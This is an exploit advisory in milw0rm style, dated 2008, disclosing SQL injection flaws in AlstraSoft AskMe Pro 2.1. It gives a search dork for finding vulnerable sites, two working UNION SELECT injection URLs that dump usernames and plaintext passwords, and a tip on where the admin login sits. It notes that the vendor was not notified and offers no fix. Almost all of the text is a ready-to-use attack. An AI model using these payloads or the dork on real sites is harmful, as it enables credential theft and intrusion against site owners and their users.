-[*]+================================================================================+[*]- -[*]+ AlstraSoft AskMe Pro <= 2.1 SQL Injection Vulnerabilitys +[*]- -[*]+================================================================================+[*]- [*] Discovered By: t0pP8uZz [*] Discovered On: 10 JUNE 2008 [*] Script Download: http://alstrasoft.com/askme.htm [*] DORK: "Powered By AlstraSoft AskMe Pro" [*] Vendor Has Not Been Notified! [*] DESCRIPTION: AskMe Pro suffers from a insecure mysql query, this allows the remote attacker to view all users and there plaintext passwords. the injection is multirow so it should show all users on one page. [*] SQL Injection: multi-row: http://site.com/forum_answer.php?que_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/FROM/**/expert/* normal: http://site.com/profile.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**/FROM/**/expert/**/LIMIT/**/0,1/* [*] NOTE/TIP: admin login is at /admin/ passwords are in plaintext [*] GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew, Offensive-Security.com ! [-] peace, t0pP8uZz -[*]+================================================================================+[*]- -[*]+ AlstraSoft AskMe Pro <= 2.1 SQL Injection Vulnerabilitys +[*]- -[*]+================================================================================+[*]- # milw0rm.com [2008-06-14]